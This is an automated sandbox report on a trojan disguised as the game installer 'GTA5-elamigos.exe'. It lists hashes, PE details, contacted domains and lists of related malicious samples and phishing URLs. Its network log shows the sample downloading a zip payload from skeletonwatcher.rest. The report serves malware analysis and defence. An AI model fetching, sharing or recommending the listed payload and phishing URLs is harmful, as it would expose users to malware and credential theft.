https://deno.land/std/examples/colors.ts	GTA5-elamigos.exe	false		high
http://.css	GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	false		high
https://some/file.ts	GTA5-elamigos.exe	false	Avira URL Cloud: safe	unknown
https://github.com/clap-rs/clap/issues	GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	false		high
https://dl.deno.land/canary-latest.txt	GTA5-elamigos.exe	false	Avira URL Cloud: safe	unknown
https://deno.land/std/	GTA5-elamigos.exe	false		high
https://w3c.github.io/user-timing)	GTA5-elamigos.exe	false	Avira URL Cloud: safe	unknown
https://golang.org/pkg/io/#pkg-constants	GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dl.deno.land/canary/P	GTA5-elamigos.exe	false	Avira URL Cloud: safe	unknown
https://crbug.com/v8/8520	GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D91E000.00000002.00000001.01000000.00000003.sdmp	false		high
https://fetch.spec.whatwg.org/#concept-construct-readablestream	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://developer.mozilla.org/en-US/docs/Web/API/WorkerGlobalScope)	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000007.00000002.2338046600.000001DAD1EBF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://deno.land/std/testing/asserts.ts	GTA5-elamigos.exe	false		high
https://github.com/denoland/deno/tree/master/test_plugin	GTA5-elamigos.exe	false		high
https://fetch.spec.whatwg.org/#dom-headers	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Global)	GTA5-elamigos.exe	false		high
https://fetch.spec.whatwg.org/#concept-headeP	GTA5-elamigos.exe, 00000000.00000003.2359496807.0000024F20456000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2362578326.0000024F20456000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2363366287.0000024F20462000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2360587322.0000024F20456000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/denoland/deno/issues/4591)	GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deno.land/manual	GTA5-elamigos.exe	false		high
http://.jpg	GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	skeletonwatcher.rest	European Union		13335	CLOUDFLARENETUS	false
185.199.108.133	raw.githubusercontent.com	Netherlands		54113	FASTLYUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585597
Start date and time:	2025-01-07 22:12:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	GTA5-elamigos.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@18/25@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 88% Number of executed functions: 4 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: GTA5-elamigos.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
185.199.108.133	cr_asm.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	gaber.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
skeletonwatcher.rest	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
skeletonwatcher.rest	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
raw.githubusercontent.com	Customer.exe	Get hash	malicious	XWorm	Browse	185.199.111.133
	Solara Bootstrapper.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	Solara.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	3lhrJ4X.exe	Get hash	malicious	LiteHTTP Bot	Browse	185.199.111.133
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	185.199.109.133
	ipmsg5.6.18_installer.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	over.ps1	Get hash	malicious	Vidar	Browse	185.199.109.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://t.co/sSZe0hnReU	Get hash	malicious	Unknown	Browse	172.66.0.227
	dog.jpg.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	random.exe	Get hash	malicious	CStealer	Browse	162.159.128.233
	random.exe	Get hash	malicious	CStealer	Browse	172.67.74.152
	audio.mp3_JasonhTranscript.html	Get hash	malicious	Unknown	Browse	188.114.96.3
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse	162.159.135.232
	QoRXFaE8Xn.exe	Get hash	malicious	DCRat	Browse	188.114.96.3
	https://pozaweclip.upnana.com/	Get hash	malicious	Unknown	Browse	104.18.11.207
FASTLYUS	https://t.co/sSZe0hnReU	Get hash	malicious	Unknown	Browse	199.232.188.159
	audio.mp3_JasonhTranscript.html	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://dev-alberta-ca.pantheonsite.io/?email=central@ngps.ca	Get hash	malicious	Unknown	Browse	23.185.0.4
	https://pozaweclip.upnana.com/	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://us01-i-prod-estimating-storage.s3.amazonaws.com/598134325679181/562949954787293/Documents/1706942/Hoosier%20Crane%20Service%20Company.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428	Get hash	malicious	Unknown	Browse	151.101.195.9
	https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t	Get hash	malicious	Unknown	Browse	151.101.2.137
	Globalfoundries eCHECK- Payment Advice.html	Get hash	malicious	Unknown	Browse	151.101.2.137
	01-06-2025 Docu.invpd (1).pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137

Process:	C:\Users\user\Desktop\GTA5-elamigos.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.9219280948873623
Encrypted:	false
SSDEEP:	3:jlMy1:jqs
MD5:	408BD618C1EC3F1C24C31CB274D58626
SHA1:	0E184590EEB057762531050E22CB9A8B9EBF2EC5
SHA-256:	7AC3F146E2A2A47CD278AD8E2E4B62E88D06E985983611B0A93A819170119EF8
SHA-512:	CE183B202A1C2180D6FC7DEE6F613DA1F591CAF5DAAFAC5034D573C06C71243EF4D722720D25360B829AE087D899A316A392608A5853389209FC452E8C74FD72
Malicious:	false
Preview:	bmFyY29iYXV0aXphbw==

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1464
Entropy (8bit):	5.313343649175604
Encrypted:	false
SSDEEP:	24:3cSKco4KmZjKMs4RPTkmAmoUe7u1o+m9qr9t7J0gt/NKmNUNuTx9r8Hv9ILAl/:MSU4xc4R4mloUeCa+m9qr9tK8NfUNuTM
MD5:	4C419FD8186B0C77C747583B2E027EEF
SHA1:	0EF4A50263963DE2F326D1B72C32B5BDF6BC33F7
SHA-256:	6104B67E59D667FC2B9599BB15ABBA21741A24C371E1BC81B2C8B5B59A1272FC
SHA-512:	29FF11E322BDB89222CAC7DA9C40E3B8FA6046CC38236CF02F40B28E4981F200F4A45B38CFB67946DC14D84079C593C121365F608F49F8EB50C1432C34481826
Malicious:	false
Preview:	@...e...........)...................../.........................@...............\|.jdY\.H.s9.!..\|(.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.ConfigurationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.925395819011247
Encrypted:	false
SSDEEP:	24:etGSMW5GIYq/dudQ8OMXxkjvtkZfI9z8NoVWI+ycuZhNMakSIPNnq:6M9InudjnXijOJI9zYl1ulMa3wq
MD5:	DA2E032F6B476250A6FE6FE6930260E1
SHA1:	C10A2D804A3F904B149B50297EAFCB88880AEDA8
SHA-256:	352D3E49974160ED84AABCD0BC27E7D5329B9C0E25470BB44501C9F415304D5D
SHA-512:	4C5773357C14663430AF1B64B0D69D5CDB09775568764E3428F72341DEA048F602D870C0943EDD202B13C3AB97A63BCE0997605D246D6EEB67CB43A068A8282F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}g...........!.................#... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..@.............................................................(....BSJB............v4.0.30319......l...<...#~......,...#Strings............#US.........#GUID.......T...#Blob...........G5........%3................................................................-.&...x.Y.....Y.................Y.................................... 4............ H.....P ......S...... ..................S...!.S. .).S...1.S.%...S............3.....!.....4.......H.........................

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.810596582796651
TrID:	Win64 Executable Console (202006/5) 87.25% Visual Basic Script (13500/0) 5.83% Win64 Executable (generic) (12005/4) 5.19% Generic Win/DOS Executable (2004/3) 0.87% DOS Executable Generic (2002/1) 0.86%
File name:	GTA5-elamigos.exe
File size:	34'434'422 bytes
MD5:	b885bdba1ae235bef39832702abc5b03
SHA1:	c42955695575c35d23f6a5e1fb3808b2bc23f74e
SHA256:	90a4107e2851d7e178995e2ecbeef51c0390991e4ed7473e253dcb81a8c5f3a9
SHA512:	860effbdd6f70196873f8d71818e66cb3afef465eb2d66e7a44af7ff2c2c65df8b3211c09a7bcfb2abccf25f98961950d290db57adb03f6418acf1bb92575710
SSDEEP:	393216:V73Y9M927d8MFbOvYHJKOVLuLLna3W8oLPnW:V73Y9MwJ8M08KOoLG3W8oLW
TLSH:	78777C03BE8618A9D09DC474834B46639A213CDB1B39B9FF25D935252F7EAF05B3A314
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y5.h.T.;.T.;.T.;.?.:;T.;.?.:.T.;.?.:.T.;...;.T.;.%.:,T.;.%.:.T.;.%.:.T.;.?.:.T.;.T.;.T.;.&.:.T.;.T.;.V.;.&.:.T.;.&&;.T.;.&.:.T.

Entrypoint:	0x14152fd70
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FEC9DFF [Wed Dec 30 15:34:23 2020 UTC]
TLS Callbacks:	0x4085d620, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	f89058cc20f309b3f79572b824dcfee6

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1f59890	0x68	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f598f8	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2060000	0x5080	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1f8c000	0xd2378	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2066000	0x1d308	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1d78fe8	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1d79180	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1d79040	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1560000	0x758	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x155e6a0	0x155e800	5dd19ef7ee076e0d89cacb281bd94528	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1560000	0x9fb1e4	0x9fb200	cbad2020cf41a27fa6ee9ee4c10f33d8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f5c000	0x2f9e0	0x11e00	51ecf0e0221c4fe5cc72d7c0d642f757	False	0.14178594842657344	data	2.77637946428186	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1f8c000	0xd2378	0xd2400	711bc06da1d5afe0a08f5b20756b06ed	False	0.45217514491676575	data	6.880219414842573	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x205f000	0x94	0x200	cb7fee38457a4f11371c8882f560f7b2	False	0.212890625	data	1.7840059761324978	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2060000	0x5080	0x5200	e211ae09f398b6341ace3a00da940e89	False	0.9293540396341463	data	7.815526386445253	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2066000	0x1d308	0x1d400	4495e6c3818044f31171e2aea60d7122	False	0.20582932692307693	data	5.4835830175533795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x20601d8	0x2dd	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	English	United States	1.015006821282401
RT_ICON	0x20604b8	0x54a	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	English	United States	1.0081240768094535
RT_ICON	0x2060a08	0x7b6	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	English	United States	1.0030395136778116
RT_ICON	0x20611c0	0xbce	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	English	United States	0.9923891462607545
RT_ICON	0x2061d90	0xf62	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0027932960893855
RT_ICON	0x2062cf8	0x201a	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.0004867364322219
RT_GROUP_ICON	0x2064d18	0x5a	data	English	United States	0.8111111111111111
RT_VERSION	0x2064d78	0x308	data	English	United States	0.4587628865979381

DLL	Import
WS2_32.dll	listen, WSAGetLastError, closesocket, WSASendTo, WSARecvFrom, WSAGetOverlappedResult, setsockopt, WSASend, getsockopt, WSAIoctl, WSASocketW, WSARecv, getaddrinfo, getpeername, shutdown, recv, ioctlsocket, getsockname, WSACleanup, WSAStartup, freeaddrinfo, bind
KERNEL32.dll	GetOEMCP, GetACP, IsValidCodePage, MultiByteToWideChar, GetStringTypeW, HeapSize, GetFileSizeEx, GetConsoleOutputCP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, GetCommandLineA, SwitchToThread, SetConsoleMode, LeaveCriticalSection, CloseHandle, SetConsoleCursorPosition, lstrlenW, WaitForSingleObject, GetLastError, GetExitCodeProcess, GetCurrentProcessId, GetCommandLineW, GetProcessHeap, HeapFree, AddVectoredExceptionHandler, HeapAlloc, HeapReAlloc, GetStdHandle, GetFileInformationByHandleEx, GetConsoleMode, EnterCriticalSection, Sleep, DeviceIoControl, CreateHardLinkW, ReadFile, TerminateProcess, FreeLibrary, RegisterWaitForSingleObject, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessId, GetConsoleScreenBufferInfo, OpenProcess, SetCurrentDirectoryW, SetErrorMode, SetThreadErrorMode, LoadLibraryW, GetProcAddress, SetEnvironmentVariableW, CreateToolhelp32Snapshot, Process32First, Process32Next, SetFileTime, PostQueuedCompletionStatus, GetQueuedCompletionStatusEx, SetFileCompletionNotificationModes, CancelIoEx, WriteFile, GetOverlappedResult, CreateIoCompletionPort, SetHandleInformation, WaitForSingleObjectEx, CreateFileW, CreateSemaphoreW, ReadDirectoryChangesW, ReleaseSemaphore, CancelIo, GetSystemInfo, SetFileInformationByHandle, GetConsoleCursorInfo, SetConsoleCursorInfo, ReadConsoleInputW, FillConsoleOutputCharacterA, FillConsoleOutputAttribute, GetFileInformationByHandle, TlsGetValue, TlsSetValue, DeleteCriticalSection, GetModuleHandleW, SetLastError, GetEnvironmentVariableW, WriteConsoleW, InitializeCriticalSection, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, GetCurrentDirectoryW, LoadLibraryA, CreateMutexA, RtlLookupFunctionEntry, TlsAlloc, FormatMessageW, GetTempPathW, GetModuleFileNameW, FlushFileBuffers, DuplicateHandle, SetFilePointerEx, FindNextFileW, CreateDirectoryW, ReadConsoleW, TryEnterCriticalSection, FindFirstFileW, CreateProcessW, CreateNamedPipeW, CreateEventW, WaitForMultipleObjects, ExitProcess, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemTimeAsFileTime, FindClose, DeleteFileW, MoveFileExW, RemoveDirectoryW, RtlUnwind, CopyFileExW, CreateThread, GetFinalPathNameByHandleW, UnregisterWaitEx, SetConsoleTextAttribute, GetSystemTimes, GlobalMemoryStatusEx, GetVersionExA, RtlVirtualUnwind, GetTimeZoneInformation, WideCharToMultiByte, GetThreadTimes, GetCurrentThreadId, DeleteFileA, GetTempPathA, GetTempFileNameA, GetFileType, OutputDebugStringA, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, IsDebuggerPresent, TlsFree, QueryThreadCycleTime, GetThreadPriority, SetThreadPriority, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, TryAcquireSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, VirtualProtect, RtlAddFunctionTable, RtlDeleteFunctionTable, LoadLibraryExW, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceExecuteOnce, SetUnhandledExceptionFilter, RtlCaptureStackBackTrace, GetNativeSystemInfo, InitializeConditionVariable, OpenThread, SuspendThread, GetThreadContext, ResumeThread, CreateSemaphoreA, GetCPInfo, FindFirstFileExW, SetStdHandle, SetEndOfFile, ReleaseMutex, SetFileAttributesW, FreeLibraryAndExitThread, ExitThread, GetModuleHandleExW, EncodePointer, RtlUnwindEx, RaiseException, RtlPcToFileHeader, IsProcessorFeaturePresent, GetStartupInfoW, UnhandledExceptionFilter, InitializeSListHead, ResetEvent, SetEvent, InitializeCriticalSectionAndSpinCount
ADVAPI32.dll	RegQueryValueExW, RegOpenKeyExW, SystemFunction036, RegCloseKey
dbghelp.dll	SymInitialize, SymGetSearchPathW, SymSetSearchPathW, SymGetModuleBase64, SymFunctionTableAccess64, SymSetOptions, SymFromAddr, SymGetLineFromAddr64, StackWalk64
ole32.dll	CoTaskMemFree
SHELL32.dll	SHGetKnownFolderPath
WINMM.dll	timeGetTime

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 22:13:52.885036945 CET	192.168.2.5	1.1.1.1	0xdea5	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:14:09.384779930 CET	192.168.2.5	1.1.1.1	0xff3a	Standard query (0)	skeletonwatcher.rest	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 22:13:52.892910004 CET	1.1.1.1	192.168.2.5	0xdea5	No error (0)	raw.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:13:52.892910004 CET	1.1.1.1	192.168.2.5	0xdea5	No error (0)	raw.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:13:52.892910004 CET	1.1.1.1	192.168.2.5	0xdea5	No error (0)	raw.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:13:52.892910004 CET	1.1.1.1	192.168.2.5	0xdea5	No error (0)	raw.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:14:09.427901030 CET	1.1.1.1	192.168.2.5	0xff3a	No error (0)	skeletonwatcher.rest	188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 22:14:09.427901030 CET	1.1.1.1	192.168.2.5	0xff3a	No error (0)	skeletonwatcher.rest	188.114.97.3	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 22:14:09.433976889 CET	121	OUT	GET /api/get/dll HTTP/1.1 accept: / user-agent: Deno/1.6.3 accept-encoding: gzip, br host: skeletonwatcher.rest
Jan 7, 2025 22:14:10.497035027 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 21:14:10 GMT Content-Type: application/zip Content-Length: 79147321 Connection: keep-alive Content-Disposition: attachment; filename=EsqueleSquad.zip Last-Modified: Thu, 21 Nov 2024 23:27:10 GMT Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate Cache-Control: no-store ETag: "1732231630.572999-79147321-2145064444" Expires: 0 Pragma: no-cache Access-Control-Allow-Origin: http://localhost:5173 Vary: Origin cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PgMkGbjAW4J6K2Bd0Owy8ihmBLmFpGjmE%2BFTtMCc95guIcPjXg%2BdPIWyZRxNq9hnCYi1x80J%2B8JZP%2FkF9u4rpvKRzfhN0%2Bi3Nc5jkbz%2F%2BE%2BnoaHqBgPrSanQ10Xxj0EUS8fZl3x4PQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe6f4b3af58422f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1643&rtt_var=821&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=121&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 50 4b 03 04 14 00 08 00 08 00 3b 03 76 59 00 00 00 00 00 00 00 00 00 da b7 04 0c 00 20 00 6c 61 75 6e 63 68 65 72 2e 65 78 65 55 54 0d 00 07 82 c1 3f 67 b3 c1 3f 67 82 c1 3f 67 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 cc bd 7d 7c 14 d5 d5 38 be b3 bb 09 01 22 b3 68 d4 58 51 c2 e3 da 66 2a 6a a2 a8 ec Data Ascii: PK;vY launcher.exeUT?g?g?gux}\|8"hXQf*j
